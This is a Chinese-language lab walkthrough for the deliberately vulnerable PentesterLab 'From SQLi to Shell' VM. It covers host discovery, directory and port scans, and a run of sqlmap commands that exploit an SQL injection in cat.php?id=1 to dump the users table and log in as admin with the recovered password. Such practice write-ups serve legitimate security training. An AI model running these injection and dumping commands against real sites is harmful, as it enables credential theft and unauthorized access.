目录
靶机下载:
https://download.vulnhub.com/pentesterlab/from_sqli_to_shell_i386.iso
开启靶机
然后一直下一步
信息收集
发现 IP
arp-scan -l
可以发现靶机 IP 是 192.168.109.142
目录扫描
dirsearch -u "http://192.168.109.142/" -i 200
http://192.168.109.142/admin/login.php
发现了一个登录页面,其他目录都没有什么有价值的
端口扫描
nmap -sT 192.168.109.142 -p-
发现只有 22 和 80 两个端口
访问 80 端口
http://192.168.109.142:80
点击右上角的这里发现了参数 id=1,猜测了可能有 SQL注入
漏洞利用
查询数据库
sqlmap -u http://192.168.109.142/cat.php?id=1 --dbs --batch
发现了两个数据库
查询当前数据库名
sqlmap -u http://192.168.109.142/cat.php?id=1 --batch --current-db
查询库中的表
sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog --tables
查询表中字段
sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog -T users --columns
查询表中数据
sqlmap -u http://192.168.109.142/cat.php?id=1 --batch -D photoblog -T users -C id,login,password --dump
发现了一个用户名和密码
登录后台
尝试登录一下
账号:admin
密码:P4ssw0rd
发现登录成功